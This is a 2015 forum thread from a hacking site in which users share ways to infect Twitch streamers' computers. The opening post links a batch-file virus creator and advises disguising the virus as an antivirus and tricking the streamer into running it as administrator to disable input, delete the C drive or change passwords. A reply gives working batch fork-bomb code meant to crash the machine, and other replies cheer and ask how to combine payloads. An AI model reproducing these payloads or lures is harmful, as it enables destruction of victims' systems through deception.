Sinisterly
super easy method to make viruses and not spam sys32 in raids - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: General (https://sinister.ly/Forum-General)
+--- Forum: The Lounge (https://sinister.ly/Forum-The-Lounge)
+--- Thread: super easy method to make viruses and not spam sys32 in raids (/Thread-super-easy-method-to-make-viruses-and-not-spam-sys32-in-raids)



super easy method to make viruses and not spam sys32 in raids - capitalistbrocoli - 02-21-2015

ok so i found a really good way to create viruses that could infect people on twitch really easily. the thing is use is called SONIC BAT link: http://blackheavenhacks.blogspot.com/2013/04/sonic-bat-batch-file-virus-creator.html
if you get the streamer to download it you can do shit like disable mousE or keyboard, delete c drive, change passwords and things along that line.
i made a virus on my shit laptop and ran it and my mouse is disabled and i cant log in.
all you need to do is to get them to download your virus (which you can disquise as an antivirus, tell them to run it as administrator tell them to press y and you're good.



PROTIP: NEVER UNDER ANY CIRCUMSTANCES RUN THE .BAT FILE ON YOUR SYSTEM, IT WILL RUIN YOUR COMPUTER!!!!!!!!!
 


RE: super easy method to make viruses and not spam sys32 in raids - Ley - 02-21-2015

SANIC IS IN DA HOUSE BOISSSSS GOTTA GO FASTTTTTTTTT


RE: super easy method to make viruses and not spam sys32 in raids - 6million - 02-21-2015

This sounds fucking amazing, nice
 


RE: super easy method to make viruses and not spam sys32 in raids - sex - 02-21-2015

Put this in a batch file and name it system32removal or something, and it'll spam open the file until the computer crashes.
Code:
:loop  start system32removal.bat  Goto loop
Now this one is more deadlier
Code:
:loop start name.bat echo .>> %random%.txt Goto loop
This creates text files wherever the batch file is located, for instance if the bat file was on desktop, it would spam text files with random numbers as the name as the title. As it is creating the files, it's opening more batch files that create more text files, so it's an incremental explosion of text files.


RE: super easy method to make viruses and not spam sys32 in raids - kennedyless - 02-21-2015

(02-21-2015, 03:43 AM)sex Wrote: Put this in a batch file and name it system32removal or something, and it'll spam open the file until the computer crashes.



I hereby call it the "Neverending Cum-Bomb"
 


RE: super easy method to make viruses and not spam sys32 in raids - imATotalSkid - 02-21-2015

lmao nice. have you ever gotten a streamer with this?


RE: super easy method to make viruses and not spam sys32 in raids - somerandomLad - 02-22-2015

Yess this is dank:O Anyone already figured out if it´s possible to make one BAT with multiple executables (so eg. Shutdown the PC, flood the sys32 and disable mouse in one file)